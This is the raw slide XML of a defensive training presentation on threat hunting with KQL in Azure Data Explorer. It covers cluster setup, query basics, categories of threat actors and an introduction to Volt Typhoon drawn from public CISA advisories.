          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{4CCB3584-3AA0-4595-BD82-808302B781F3}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>13/08/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84099704-0C75-41CF-6023-B3CA885AF60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BBF3DB8-C2A4-5213-278C-859D5A88EE89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{59FEC748-9296-4ED5-9FC3-E98E3133FF86}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1456629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DE7164-44A4-2BC7-CF2C-01C4263E9D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U"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBF34BAA-12A2-CA2E-0348-4BABB15646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C1B9CA2F-2A0F-58EF-C02F-A653817757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CCB3584-3AA0-4595-BD82-808302B781F3}" type="datetimeFigureOut">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>13/08/2025</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6EB1879-336D-9F20-6214-DAB8098D8E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40C1C8B1-9124-3D06-45D2-63A44E1ABB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9FEC748-9296-4ED5-9FC3-E98E3133FF86}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124311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dataexplorer.azure.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6FDE-ACE4-5978-44FF-C2CA781495CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Threat Hunting with KQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAEF7F97-1882-836C-175F-26CDB1878188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0"/>
              <a:t>BLUECON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> #0x0F</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Azure Data Explorer - YouTube">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BD8A547-39CB-C250-2492-74BAA55F8F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795" t="21052" r="21047" b="20662"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9917892" y="108528"/>
            <a:ext cx="2165817" cy="21705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868972B-D7A5-4ADF-9A9D-8C3FD90E5565}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4587285" y="3661649"/>
            <a:ext cx="1865769" cy="442176"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4013544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BC8117-EBC0-D3ED-FF74-8467DAD5C04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6C00C39-D9FE-3354-FA4D-E5EA497634AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1314824" y="735106"/>
            <a:ext cx="10053763" cy="2928470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Creating your free</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Azure Data Explorer cluster!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1FEE242-5EE5-EB87-DE88-F5B6DC10CB72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1350682" y="4870824"/>
            <a:ext cx="10005951" cy="1458258"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Free cloud data analytics with KQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="293281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A9ED0D0-8C91-FE6D-7FFC-489EE2A5C82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ED7AD6-A680-C251-445F-82C62FA23134}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="294538"/>
            <a:ext cx="9895951" cy="1033669"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Getting started with Azure Data Explorer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD17E3BF-F585-BAAD-B0B6-660C2776A027}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="2318197"/>
            <a:ext cx="9724031" cy="3683358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>Go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>dataexplorer.azure.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>, tick the create box, and click “Sign in and create cluster” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>Sign in with your personal Microsoft account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>You now have a free Azure Data Explorer cluster!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Supports many file formats for upload, or can get data from a URL – even Amazon S3 storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>100GB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> of total storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0"/>
              <a:t>1GB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> size limit per file uploaded</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>Select your new cluster in the sidebar, then click the “Get data” button</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1399839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D4FA9C9-435C-E7BE-BF28-3AB28AA2478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A62DAD0-D845-CE2A-089B-75B0252CFE77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1314824" y="735106"/>
            <a:ext cx="10053763" cy="2928470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Basics of KQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2374F3C0-26EA-9BCA-1586-4C95777CF231}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1350682" y="4870824"/>
            <a:ext cx="10005951" cy="1458258"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Viewing and filtering data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2185943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BBF2BC-B4A8-D2BF-0FE0-E37C1BA058DB}"/>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DA4A56A-6767-91CD-2914-5E388A2DC45B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1383564" y="348865"/>
            <a:ext cx="9718111" cy="1576446"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Viewing and filtering data with KQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9804E34D-D80C-BBE0-3F53-7B14489FABE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1178903967"/>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8159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607846-AECB-4836-02C0-C4197ACEA06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30925D6-FF21-E8CC-6366-6FFB81FA59F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1314824" y="735106"/>
            <a:ext cx="10053763" cy="2928470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Types of threat actors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{827D3D58-5DE1-FB50-4642-93CFA858BA4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1350682" y="4870824"/>
            <a:ext cx="10005951" cy="1458258"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Cybercriminal, hacktivist, state-sponsored and insider threat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242167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76B615-C7A6-F2D1-7487-83C25BB798FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070211" y="-396240"/>
            <a:ext cx="5754896" cy="1667569"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" dirty="0"/>
              <a:t>Types of threat actors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Graphic 6" descr="Robber">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0428679C-F1F8-1EA5-1DCE-F7AA7863F1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6131" y="1583749"/>
            <a:ext cx="3549590" cy="3549590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0DA6DE3-831C-BD38-5713-9063FBF02E93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3855721" y="1461829"/>
            <a:ext cx="7863838" cy="3935789"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" b="1" dirty="0"/>
              <a:t>Cybercriminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t> – Most common threat to most organisations; financially motivated (e.g. ransomware operators)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>The damage costs of cybercrime passed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" b="1" dirty="0"/>
              <a:t>USD$10 Trillion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t> this year</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" b="1" dirty="0"/>
              <a:t>Hacktivists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t> – rare; activism via hacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" b="1" dirty="0"/>
              <a:t>Insider threat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>– potentially common depending on your organisation; a trusted employee who abuses their access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" b="1" dirty="0"/>
              <a:t>State-sponsored threat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>– focused; targets adversaries of the supporting government for espionage, disruption or damage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>Traditionally known as Advanced Persistent Threats (APTs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>Includes intelligence services, military cyber divisions, and anyone a government pays or compels to work for the country’s interests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>E.g. Volt Typhoon, the China-sponsored actor that infiltrated U.S. energy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Rectangle 24">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5631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63D7F34-2234-D5D5-E37F-C37715349F1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169CAFA-9F7D-AE52-7B33-F3188DAF05F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1314824" y="735106"/>
            <a:ext cx="10053763" cy="2928470"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Who will we be hunting for?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{316A30DA-9356-F400-7334-ED84091A1B3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1350682" y="4870824"/>
            <a:ext cx="10005951" cy="1458258"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-AU"/>
              <a:t>Volt Typhoon, a PRC-sponsored threat actor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="974712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C24F75-6863-56AA-6762-7F9B4AE4CCA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1ECFF1-DD28-6C01-B0B0-0EEAADA53C35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="294538"/>
            <a:ext cx="9895951" cy="1033669"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Volt Typhoon</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1447DB74-AE06-07C1-DD98-CA3F8AB7008B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371599" y="2318197"/>
            <a:ext cx="9724031" cy="3683358"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>Volt Typhoon is a group that represents China-nexus activity targeting US critical infrastructure, particularly for the military.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>Volt Typhoon activity was prolific in the US in 2023; CISA made most intelligence </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" u="sng" dirty="0"/>
              <a:t>publicly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t> available. This is now common.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Googling “Volt Typhoon advisory” will bring up both CISA advisories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>Volt Typhoon’s goal is to collect data on how to damage adversaries’ infrastructure should a conflict arise, and then position themselves to be ready to do so.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0"/>
              <a:t>We will use example activity from the Volt Typhoon reports as practice for hunting.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
